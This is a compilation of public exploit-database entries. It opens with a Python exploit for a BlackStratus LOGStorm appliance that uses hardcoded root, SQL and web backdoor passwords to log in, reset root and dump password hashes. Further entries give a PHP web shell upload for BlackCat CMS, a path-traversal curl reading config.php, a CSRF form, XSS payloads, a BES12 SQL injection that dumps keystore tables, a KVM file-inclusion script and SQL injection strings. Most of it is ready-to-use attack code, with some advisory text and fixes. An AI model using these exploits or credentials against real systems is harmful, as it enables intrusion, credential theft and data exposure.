# [sql*]  utilizes bug #3 to sql login to a given <host> as privileged htr user and retrieve web portal credentials
# [web]   utilizes bug #4 to http login to a given <host> as hardcoded webserveruser (presumably) admin account
# [scan]  scans a given <host>/24 for potentially vulnerable appliances
#
# *sql only works remotely before license validation as afterwards sql server gets firewalled, becoming local only.
#
# Note: this exploit is not and cannot be weaponized simply because exploits are not weapons.
#
# -Fixes-
#
# BlackStratus did not coherently respond to product security inquiries, so there's no official fix. But
# customers may (now) root the appliance themselves to change the passwords, disable root login, firewall
# network services or remove additional user accounts to mitigate these vulnerabilities.. or choose another
# product altogether because this appliance, as of today, simply adds too much attack surface to the network.
#
# -Bonuses-
#
# 1) Another account's (htftp/htftp) shell is set to /bin/false, which affords at least a couple attacks
# 
# 1.1) The appliance is vulnerable to CVE-2016-3115, which we can use to read/write to arbitrary files
# 1.2) We can use the login to do port forwarding and hit local services, such as the Java instance running
# in debug mode and probably exploitable with jdwp-shellifer.py (also netcat with -e is installed by default!)
#
# 2) More sql accounts: htm/htm_pwd and tvs/tvs_pwd
#

import sys
import socket
import time
from paramiko import ssh_exception
import paramiko
import MySQLdb
import httplib
import urllib

SSH_BANNER = "_/_/_/_/"
SSH_PORT = 22
MYSQL_PORT = 3306
MYSQL_DB = "htr"
MYSQL_CMD = "select USER_ID,hex(MD5_PASSWORD) from users;"
WEB_URL = "/tvs/layout/j_security_check"

ROOT_CREDS =   ["root", "3!acK5tratu5"]
HTINIT_CREDS = ["htinit", "htinit"]
MYSQL_CREDS =  ["htr", "htr_pwd"]
WEB_CREDS =    ["webserviceuser", "donotChangeOnInstall"]


def main():
    if(len(sys.argv) < 2):
        print("Usage: %s <action> <host>" % sys.argv[0])
        print("Eg.    %s root 10.1.1.3\n" % sys.argv[0])
        print("Actions: root reset sql web scan")
        return
 
    action = str(sys.argv[1])
    host = str(sys.argv[2])

    if("scan" not in action):
        try:
            socket.inet_aton(host)
        except socket.error:
            print("[-] %s doesn't look like a valid ip address" % host)
            return

    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    #
    # ssh login as root and execute 'id'
    #
    if(action == "root"):
        try:
            ssh.connect(host, SSH_PORT, ROOT_CREDS[0], ROOT_CREDS[1], timeout=SSH_TIMEOUT)
        except ssh_exception.AuthenticationException:
            print("\n[-] Action failed, could not login with root credentials\n")
            return

        print("[+] Success!")
        ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command("id")
        print(ssh_stdout.readline())

        return

    #
    # ssh login as htinit and reset root password to the default
    #
    elif(action == "reset"):
        print("[~] Resetting password on %s..." % host)

        try:
            ssh.connect(host, SSH_PORT, HTINIT_CREDS[0], HTINIT_CREDS[1], timeout=SSH_TIMEOUT)
        except ssh_exception.AuthenticationException:
            print("\n[-] Reset failed, could not login with htinit credentials\n")
            return

        ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command("")

        ssh_stdin.write("4" + "\n")
        time.sleep(2)
        ssh_stdin.write(ROOT_CREDS[1] + "\n")
        time.sleep(2)
        ssh_stdin.write("^C" + "\n")
        time.sleep(1)

        print("[+] Appliance root password should now be reset")

        return

    #
    # sql login as htr and select user/hash columns from the web users table
    #
    elif(action == "sql"):
        print("[~] Asking %s for it's web users and their password hashes..." % host)

        try:
            db = MySQLdb.connect(host=host, port=MYSQL_PORT, user=MYSQL_CREDS[0], passwd=MYSQL_CREDS[1], db=MYSQL_DB, connect_timeout=3)
        except MySQLdb.Error as error:
            print("\n[-] Failed to connect to %s:\n%s\n" % (host, error))
            return

        cursor = db.cursor()
        cursor.execute(MYSQL_CMD)

        data = cursor.fetchall()

        print("[+] Got creds!\n")

        for row in data:
            print("USER_ID: %s\nMD5_PASSWORD: %s\n" % (row[0], row[1]))

        db.close()

        return

    #
    # http login as webserviceuser and gain presumably admin privileges
    #
    elif(action == "web"):
        print("[~] Attempting to login as backdoor web user at %s..." % host)

        try:   
            client = httplib.HTTPSConnection(host)
        except:
            print("[-] Couldn't establish SSL connection to %s" % host)
            return

        params = urllib.urlencode({"j_username" : WEB_CREDS[0], "j_password" : WEB_CREDS[1]})
        headers = {"Host" : host, "Content-Type" : "application/x-www-form-urlencoded", "Content-Length" : "57"}

        client.request("POST", WEB_URL, params, headers)

        response = client.getresponse()

        if(response.status == 408):
            print("[+] Success!")
        else:
            print("[-] Service returned %d %s, which is actually not our criteria for success" % (response.status, response.reason))

        return

    #
    # check the ssh network banner to identify appliances within range of <host>/24
    #
    elif(action == "scan"):
        count = 0
        print("[~] Scanning %s for LOGStorm appliances..." % sys.argv[2])

        for x in range(1,255):
            banner = None

            #
            # 10.1.1.1/24 -> 10.1.1.[x]
            #
            host = str(sys.argv[2]).split('/')[0][:-1] + str(x)

            try:
                ssh.connect(host, SSH_PORT, "user-that-doesnt-exist", "pass-that-doesnt-work", timeout=2)
            except ssh_exception.NoValidConnectionsError:
                pass
            except socket.timeout:
                pass
            except ssh_exception.AuthenticationException as error:
                banner = ssh._transport.get_banner()
                if banner and SSH_BANNER in banner:
                    print("[!] %s\n" % host)
                    count+=1

        print("[+] Found %d appliance(s)"% count)

        return

 
if __name__ == "__main__":
    main()
HireHackking 
source: https://www.securityfocus.com/bid/57910/info

BlackNova Traders is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. 

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/bnt/news.php?startdate=2013/02/11[SQLi]
HireHackking 
# Exploit Title: BlackMoon FTP Server 3.1.2.1731 - 'BMFTP-RELEASE' Unquoted Serive Path 
# Exploit Author: Debashis Pal
# Date: 2019-10-17
# Vendor : Blackmoonftpserver
# Source: http://www.tucows.com/preview/222822/BlackMoon-FTP-Server?q=FTP+server
# Version: BlackMoon FTP Server 3.1.2.1731
# CVE : N/A
# Tested on: Windows 7 SP1(64bit), Windows 7 SP1(32bit)

1. Description:
Unquoted service paths in BlackMoon FTP Server versions 3.1.2.1731 'BMFTP-RELEASE' have an unquoted service path.

2. PoC:

C:\>sc qc BMFTP-RELEASE
sc qc BMFTP-RELEASE
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: BMFTP-RELEASE
        TYPE               : 10  WIN32_OWN_PROCESS 
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Selom Ofori\BlackMoon FTP Server\FTPService.exe
        LOAD_ORDER_GROUP   : 
        TAG                : 0
        DISPLAY_NAME       : BlackMoon FTP Service
        DEPENDENCIES       : 
        SERVICE_START_NAME : LocalSystem


3. Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot.
If successful, the local user's code would execute with the elevated privileges of the application.



# Disclaimer
=============
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
HireHackking 
Exploit Title: Blackcat Cms v1.4 - Stored XSS
Application: blackcat Cms
Version: v1.4
Bugs:  Stored XSS
Technology: PHP
Vendor URL: https://blackcat-cms.org/
Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
Date of found: 13.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps: 

1. login to account
2. go to pages (http://localhost/BlackCatCMS-1.4/upload/backend/pages/modify.php?page_id=1)
3. set as <img src=x onerror=alert(4)>
4. Visit http://localhost/BlackCatCMS-1.4/upload/page/welcome.php?preview=1
HireHackking 
Exploit Title: Blackcat Cms v1.4 - Remote Code Execution (RCE)
Application: blackcat Cms
Version: v1.4
Bugs:  RCE
Technology: PHP
Vendor URL: https://blackcat-cms.org/
Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
Date of found: 13.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps: 
1. login to account as admin
2. go to admin-tools => jquery plugin (http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr)
3. upload zip file but this zip file must contains poc.php 
poc.php file contents 
<?php $a=$_GET['code']; echo system($a);?>
4.Go to http://localhost/BlackCatCMS-1.4/upload/modules/lib_jquery/plugins/poc/poc.php?code=cat%20/etc/passwd

Poc request

POST /BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr HTTP/1.1
Host: localhost
Content-Length: 577
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBRByJwW3CUSHOcBT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cat7288sessionid=7uv7f4kj7hm9q6jnd6m9luq0ti
Connection: close

------WebKitFormBoundaryBRByJwW3CUSHOcBT
Content-Disposition: form-data; name="upload"

1
------WebKitFormBoundaryBRByJwW3CUSHOcBT
Content-Disposition: form-data; name="userfile"; filename="poc.zip"
Content-Type: application/zip

PKvalsdalsfapoc.php<?php 
$a=$_GET['code']; 
echo system($a);
?>
blabalaboalpoc.php
blablabla
------WebKitFormBoundaryBRByJwW3CUSHOcBT
Content-Disposition: form-data; name="submit"

Upload
------WebKitFormBoundaryBRByJwW3CUSHOcBT--
HireHackking 
# Exploit Title: BlackCat CMS 1.3.6 - Cross-Site Request Forgery
# Date: 2020-06-01
# Exploit Author: Noth
# Vendor Homepage: https://github.com/BlackCatDevelopment/BlackCatCMS
# Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
# Version: v1.3.6
# CVE : CVE-2020-25453

BlackCat CMS v1.3.6 has a CSRF vulnerability (bypass csrf_token) that
allows remote arbitrary code execution .

PoC (Remove the csrf_token value) :

<input type=“hidden” name=“&#95;&#95;csrf&#95;magic” value=“”/>
-------------------------------------------------------------------------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState(",",'/')</script>
<form action=“
http://127.0.0.1/blackcatcms-release-1.3/backend/login/ajax_index.php
”method=“POST”>
<input type=“hidden” name=“&#95;&#95;csrf&#95;magic” value=“”/>
<input type=“hidden” name=“username&#95;fieldname”
value=“username&#95;274807982ed4”/>
<input type=“hidden” name=“password&#95;fieldname”
value=“password&#95;75868428f837”/>
<input type=“hidden” name=“&#95;cat&#95;ajax” value=“1”/>
<input type=“hidden” name=“username&#95;274807982ed4” value=“accountname”/>
<input type=“hidden” name=“password&#95;75868428f837” value=“yourpassword”/>
<input type=“submit” value=“Submit request”/>
</form>
</body>
</html>
HireHackking 
# Exploit Title: BlackCat CMS 1.3.6 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 04/07/2021
# Exploit Author: Ömer Hasan Durmuş
# Vendor Homepage: https://blackcat-cms.org/
# Software Link: https://blackcat-cms.org/page/download.php
# Version: BlackCat CMS - 1.3.6

Step 1 : Login to admin account in http://TARGET/backend/start/index.php
Step 2 : Then click on the "Addons"
Step 3 : Click on "Create new"
Step 4 : Input "<script>alert(1)</script>" in the field "Module / language name"
Step 5 : Update or visit new page.

Step 1 : Login to admin account in http://TARGET/backend/start/index.php
Step 2 : Then click on the "Access"
Step 3 : Click on "Manage groups"
Step 4 : Input "<script>alert(1)</script>" in the field "Group name" and click "Add group"
Step 5 : Update or visit new page.
HireHackking 
# Exploit Title: BlackCat CMS 1.3.6 - 'Display name' Cross Site Scripting (XSS)
# Date: 16-02-2021
# Exploit Author: Kamaljeet Kumar - TATA Advanced Systems Limited
# Vendor Homepage: https://blackcat-cms.org/
# Software Link: https://blackcat-cms.org/page/download.php
# Version: BlackCat CMS - 1.3.6
# Tested on: Windows

# Steps to Reproduce:

1. To exploit this vulnerability an attacker has a login in the admin panel and clicks on the admin profile button. Then use " onmouseover=alert(1) " this XSS payload on Display name field and click on the Save button.

2 .Then refresh the page and hover the mouse on Display name filed and our XSS message pop up.
HireHackking 
# Exploit Title: BlackCat CMS v1.1.1 Arbitrary File Download Vulnerability 
# Date: 2015/06/16
# Vendor Homepage: http://blackcat-cms.org/
# Software Link: http://blackcat-cms.org/temp/packetyzer/blackcatcms_2fo3PXdKj1.zip
# Version: v1.1.1
# Tested on: Centos 6.5,PHP 5.4.41
# Category: webapps

* Description

file:/modules/blackcat/widgets/logs.php

 72 // download
 73 if(CAT_Helper_Validate::sanitizeGet('dl'))
 74 {
 75     $file = CAT_Helper_Directory::sanitizePath(CAT_PATH.'/temp/'.CAT_Helper_Validate::sanitizeGet('dl'));  <-- Not Taint Checking
 76     if(file_exists($file))
 77     {
 78         $zip = CAT_Helper_Zip::getInstance(pathinfo($file,PATHINFO_DIRNAME).'/'.pathinfo($file,PATHINFO_FILENAME).'.zip');
 79         $zip->config('removePath',pathinfo($file,PATHINFO_DIRNAME))
 80             ->create(array($file));
 81         if(!$zip->errorCode() == 0)
 82         {
 83             echo CAT_Helper_Validate::getInstance()->lang()->translate("Unable to pack the file")
 84                 . ": ".str_ireplace( array( str_replace('\\','/',CAT_PATH),'\\'), array('/abs/path/to','/'), $file );
 85         }
 86         else
 87         {
 88             $filename = pathinfo($file,PATHINFO_DIRNAME).'/'.pathinfo($file,PATHINFO_FILENAME).'.zip';
 89             header("Pragma: public"); // required
 90             header("Expires: 0");
 91             header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
 92             header("Cache-Control: private",false); // required for certain browsers
 93             header("Content-Type: application/zip");
 94             header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );
 95             header("Content-Transfer-Encoding: binary");
 96             header("Content-Length: ".filesize($filename));
 97             readfile("$filename");
 98             exit;
 99         }
100     }


POC:
curl -sH 'Accept-encoding: gzip' "http://10.1.1.1/blackcat/modules/blackcat/widgets/logs.php?dl=../config.php" |gunzip -
HireHackking 
Document Title:
===============
Blackboard LMS 9.1 SP14 - (Profile) Persistent Vulnerability 


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1900


Release Date:
=============
2017-01-09


Vulnerability Laboratory ID (VL-ID):
====================================
1900


Common Vulnerability Scoring System:
====================================
4.2


Product & Service Introduction:
===============================
Blackboard Learn (previously the Blackboard Learning Management System), is a virtual learning environment and course management system 
developed by Blackboard Inc. It is Web-based server software which features course management, customizable open architecture, and scalable 
design that allows integration with student information systems and authentication protocols. It may be installed on local servers or hosted 
by Blackboard ASP Solutions. Its main purposes are to add online elements to courses traditionally delivered face-to-face and to develop 
completely online courses with few or no face-to-face meetings.

(Copy of the Homepage: http://www.blackboard.com/learning-management-system/blackboard-learn.aspx )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered an application-side input validation vulnerability in the official Blackboard LMS 9.1 SP14.




Vulnerability Disclosure Timeline:
==================================
2017-01-09:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
BlackBoard Inc.
Product: Blackboard LMS - Content Management System 9.1 SP 14


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent cross site scripting web vulnerability has been discovered in Blackboard LMS official web-application. 

Remote attackers are able to inject malicious  code into profile information module, the vulnerability is located in 
the first name,last name of user profile, the vulnerable fields in the module (userVO.firstName & userVO.lastName).

The issue allows an attacker to inject own malicious java script codes to the vulnerable modules context. The execution 
of the vulnerability occurs in Blackboard LMS main panel & user management module. Due to our investigation we discovered 
that users with low privileged access are able to to inject their own java code to compromise other moderator or admin 
session credentials. The request method to inject is POST and the attack vector of the issue is persistent. The execute 
occurs each time an account visits the profile page of the attacking user account.

The security risk of the vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.2 
Exploitation of the web vulnerability requires a low privileged user account with restricted access and low user interaction. 
Successful exploitation of the vulnerability results in persistent phishing mails, session hijacking, persistent external 
redirect to malicious sources and application-side manipulation of affected or connected module context.


Proof of Concept (PoC):
=======================
The persistent vulnerability can be exploited by remote attackers with low privileged web-application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. User register in the blackboard LMS course as student . 
2. User goes to profile information section and inject the code persistent payload > into the firstname or lastname input fields 
Note: https://b-lms.localhost:8000/webapps/Bb-sites-user-profile-BBLEARN/profile.form
3. User submits data and saves it via POST method request with out secure parse by the web validation
4. The execution of vulnerability occurs in the user management: 
https://b-lms.localhost:8000/webapps/Bb-sites-enrollment-manager-BBLEARN/enrollmentManager.form?course_id=_431252_1 
5. Successfully reproduce the application-side web validation vulnerability! 


--- PoC Session Logs [POST] ---
POST /webapps/Bb-sites-user-profile-BBLEARN/profile.form HTTP/1.1
Host: b-lms.localhost:8000
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://b-lms.localhost:8000/webapps/Bb-sites-user-profile-BBLEARN/profile.form
Cookie: JSESSIONID=285EAF6ED95FF4574CADF4FF90F218B1; __utma=154552106.1787260759.1470597563.1470597563.1470652392.2; 
__utmz=154552106.1470597563.1.1.utmcsr=vulnlab.coursesites.com|utmccn=(referral)|utmcmd=referral|utmcct=/; COOKIE_CONSENT_ACCEPTED=true; 
NSC_106969_wjq_69.196.229.208.hspvq=ffffffff090d159545525d5f4f58455e445a4a42378b; session_id=153E1080C32EF7E9393910EC45598887; 
s_session_id=FCCF148598E6531BC4167D5C3B8A2949; JSESSIONID=C866524B3CA437DF8E0AC184746DBD36; __utmb=154552106.26.9.1470653164713; __utmc=154552106; __utmt=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 605
userVO.firstName=%3Cimg+src%3Dx+onerror%3Dprompt%284%29%3E&userVO.lastName=%3Cimg+src%3Dx+onerror%3Dprompt%284%29%3E&userVO.user.educationLevel=
Not+Disclosed&userVO.user.gender=Not+Disclosed&birthDate_datetime=&pickdate=&pickname=&birthDate_date=&userVO.user.studentId=&userType=HE_STUDENT
&userVO.user.emailAddress=sec%40secteach.me&userVO.user.street1=&userVO.user.city=&userVO.user.state=&userVO.user.zipCode=&userVO.user.country=AF
&userVO.user.mobilePhone=&userVO.user.homePhone1=&userVO.user.webPage=&userVO.userProfile.institutionGuid=User_Instr_2015-02-22_19%3A31%3A21.304
&userVO.user.jobTitle=&userVO.user.department=&top_Submit=Submit
-
RESPONSE
HTTP/1.1 200 OK
Date: Mon, 08 Aug 2016 11:06:31 GMT
Server: Apache/1.3.42 (Unix) mod_ssl/2.8.31 OpenSSL/1.0.1g mod_jk/1.2.37
X-Blackboard-appserver: fgprd-106969-156642-app006.mhint
P3P: CP="CAO PSA OUR"
X-Blackboard-product: Blackboard Learn &#8482; 9.1.140152.0
Set-Cookie: session_id=153E1080C32EF7E9393910EC45598887; Path=/; HttpOnly
Set-Cookie: s_session_id=FCCF148598E6531BC4167D5C3B8A2949; Path=/; Secure; HttpOnly
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Last-Modified: Fri, 18 Jul 2014 19:02:32 GMT
Content-Language: en-US
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html;charset=UTF-8


Reference(s):
https://b-lms.localhost:8000/
https://b-lms.localhost:8000/webapps/
https://b-lms.localhost:8000/webapps/Bb-sites-user-profile-BBLEARN/
https://b-lms.localhost:8000/webapps/Bb-sites-user-profile-BBLEARN/profile.form


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse or encode of the vulnerable firstname and lastname input fields.
Disallow the usage of special chars and filter the entries by an escape. Parse the output context in the profile.form to 
prevent application-side executions.


Security Risk:
==============
The security risk of the application-side input validation vulnerabilities in the user profile section is estimated as medium. (CVSS 4.2)


Credits & Authors:
==================
Vulnerability Lab [Research Team] - Lawrence Amer (http://www.vulnerability-lab.com/show.php?user=Lawrence%20Amer)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, 
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, 
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised 
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing 
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 				- admin@evolution-sec.com
Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically 
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or 
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific 
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.

				    Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
HireHackking 
source: https://www.securityfocus.com/bid/48009/info

Blackboard Learn is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Blackboard Learn 8.0 is vulnerable; other versions may also be affected. 

http://www.example.com/bin/common/search.pl?action=RESULTS&amp;context=USERDIR&amp;type=SEARCH&amp;operation=VIEW&amp;keyword=abcd&amp;keywordraw=%22abcd%22/%3E%3Cscript+src%3Dhttp://www.example2.com/js/alert.js%3E%3C/script%3E%3Ca+href%3D%22test%22%3Ewhat%3C/a&amp;x=26&amp;y=15&amp;by=user_id
HireHackking 
(    , )     (,
  .   '.' ) ('.    ',
   ). , ('.   ( ) (
  (_,) .'), ) _ _,
 /  _____/  / _  \    ____  ____   _____
 \____  \==/ /_\  \ _/ ___\/  _ \ /     \
 /       \/   |    \\  \__(  <_> )  Y Y  \
/______  /\___|__  / \___  >____/|__|_|  /
        \/         \/.-.    \/         \/:wq
                    (x.0)
                  '=.|w|.='
                  _=''"''=.

                presents..

BlackBerry Enterprise Service 12 (BES12) Self-Service
Affected versions: BES12 < 12.4

CVE: CVE-2016-1914 and CVE-2016-1915

PDF:
http://security-assessment.com/files/documents/advisory/Blackberry%20BES12%20Self-Service%20Multiple%20Vulnerabilities.pdf


+-----------+
|Description|
+-----------+

Blackberry BES12 is an enterprise mobile management solution and
contains a self-service web application available to mobile users. This
web application contains multiple vulnerabilities including
unauthenticated SQL
injection and reflected cross site scripting.

Limited access to an on-premise BES12 environment was provided during
the discovery of these vulnerabilities. The full impact of the
vulnerabilities in relation to compromising other portions of the BES12
solution, such as mobile devices, is unclear.


+------------+
|Exploitation|
+------------+

*SQL Injection*

The Java servlet com.rim.mdm.ui.server.ImageServlet is vulnerable to SQL
injection via the imageName parameter. This servlet is exposed at
multiple paths and is used to fetch an image from the database:

/mydevice/client/image
/admin/client/image
/myapps/client/image
/ssam/client/image
/all/client/image


This was discovered on a production BES12 on-premise deployment and the
injection vector allowed both UNION and stacked queries to be executed
on the Microsoft SQL server used by BES12. This allows full read/write
access to the database, and can potentially result in command execution
via xp_cmdshell depending on the database user configuration.

The following proof of concept demonstrates an injection payload which
will select the entire obj_keystore_entry table. The query will
serialise the entire table into an XML document which is returned in the
HTTP response as UTF-16 without the leading BOM (byte order mark)
causing most text editors to fail to display the response correctly.

https://<server>/mydevice/client/image?imageName=ui.cobranded.login.logo'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,(SELECT+*+FROM+obj_keystore_entry+FOR+XML+PATH(''))+--

The technique above can be used to download any database table available
to the BES12 database user.

Notable database tables are:
* obj_user which contains BES12 user details.
* obj_user_authentication which contains authentication tokens.
* obj_user_device which based on column names, contains enrolment
tokens, enrolment secrets and device encryption keys.

It is unclear if this information is sufficient to decrypt a lost/stolen
BES12 mobile device.


*Reflected Cross Site Scripting*

Two areas of the self-service web application exist where user-supplied
input is reflected directly in web pages, allowing a malicious user to
conduct Cross Site Scripting (XSS) attacks against users of the
application. While the application uses the HttpOnly cookie flag for
session tokens, successful exploitation allows malicious JavaScript to
perform any action within the application that the targeted user is able
to. The administrative web application is typically hosted on the same
domain and may be attacked using these XSS vectors, although this is
BES12 deployment specific.

The table below details where Cross Site Scripting was detected and
which parameters are vulnerable:

https://<server>/mydevice/index.jsp?locale="><script>alert(1)</script>
https://<server>/mydevice/loggedOut.jsp?locale="><script>alert(1)</script>


+----------+
| Solution |
+----------+


Upgrade to BES12.4.


+-------------------+
|Disclosure Timeline|
+-------------------+


Initial disclosure to Blackberry – 19 Nov 2015
Disclosure receipt confirmed by Blackberry – 19 Nov 2015
Request for update from Blackberry – 7 Dec 2015
Vulnerabilities confirmed by Blackberry – 8 Dec 2015
Blackberry confirms fixes will be released as part of BES12.4 – 28 Jan 2016
BES12.4 released – 29 Jan 2016
Advisory released – 15 Feb 2016


+-----------------------------+
|About Security-Assessment.com|
+-----------------------------+


Security-Assessment.com is a leading team of Information Security
consultants specialising in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients
include some of the largest globally recognised companies in areas such
as finance, telecommunications, broadcasting, legal and government. Our
aim is to provide the very best independent advice and a high level of
technical expertise while creating long and lasting professional
relationships with our clients.
Security-Assessment.com is committed to security research and
development, and its team continues to identify and responsibly publish
vulnerabilities in public and private software vendor's products.
Members of the Security-Assessment.com R&D team are globally recognised
through their release of whitepapers and presentations related to new
security research.

For further information on this issue or any of our service offerings,
contact us:
Web www.security-assessment.com
Email info@security-assessment.com
HireHackking 
# Exploit Title: Black Box Kvm Extender 3.4.31307 - Local File Inclusion
# Date: 05.07.2021
# Exploit Author: Ferhat Çil
# Vendor Homepage: http://www.blackbox.com/
# Software Link: https://www.blackbox.com/en-us/products/black-box-brand-products/kvm
# Version: 3.4.31307
# Category: Webapps
# Tested on: Linux
# Description: Any user can read files from the server
# without authentication due to an existing LFI in the following path:
# http://target//cgi-bin/show?page=FilePath

import requests
import sys

if name == 'main':
    if len(sys.argv) == 3:
        url = sys.argv[1]
        payload = url + "/cgi-bin/show?page=../../../../../../" + sys.argv[2]
        r = requests.get(payload)
        print(r.text)
    else:
        print("Usage: " + sys.argv[0] + ' http://example.com/ /etc/passwd')
HireHackking 
#Product : BK Mobile CMS
#Exploit Author : Rahul Pratap Singh
#Version : 2.4
#Home page Link :
http://codecanyon.net/item/jquery-mobile-website-with-full-admin-panel/2441358
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 27/Jan/2016

SQLi Vulnerability:

----------------------------------------
Description:
----------------------------------------
"g_name" parameter is not sanitized that leads to SQL Injection.

----------------------------------------
Vulnerable Code:
----------------------------------------
file: gallery1.php
line 5

$get_g_name = $_GET['g_name'];
$query_photos = "SELECT * FROM ".$get_prefix."photos WHERE
gallery_name='".$get_g_name."' ORDER BY id DESC";

----------------------------------------
Exploit:
----------------------------------------
http://localhost/BKMobile%20CMS/user/gallery1.php?g_name=1%27%20union%20all%20select%201,2,3,group_concat%28version%28%29%29,5--+

----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/bk-mobile-templatesqlipoc.png


XSS Vulnerability:

----------------------------------------
Description:
----------------------------------------
"g_name" parameter is not sanitized that leads to reflected XSS.

----------------------------------------
Vulnerable Code:
----------------------------------------
file: gallery1.php

line 81-88

<div data-role="page" id="<?php echo $get_g_name; ?>" class="jqm-demos"
<?php echo $custom_bg_active; ?>>

<?php include("../header.php"); ?>

<div role="main" class="ui-content">

<div class="jqm-block-content">
<h3><?php echo $_GET['g_name']; ?></h3>

----------------------------------------
Exploit:
----------------------------------------
http://localhost/BKMobile%20CMS/user/gallery1.php?g_name=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E

----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/bk-mobile-templatexsspoc.png

Fix:
Update to 2.5

Vulnerability Disclosure Timeline:
→ January 14, 2015 – Bug discovered, initial report to Vendor
→ January 14, 2015 – Vendor acknowledged
→ January 19, 2015 – Vendor Deployed a Patch

#######################################
# CTG SECURITY SOLUTIONS #
# www.ctgsecuritysolutions.com #
#######################################

Pub Ref:
https://0x62626262.wordpress.com/2016/01/27/bk-mobile-cms-sqli-and-xss-vulnerability
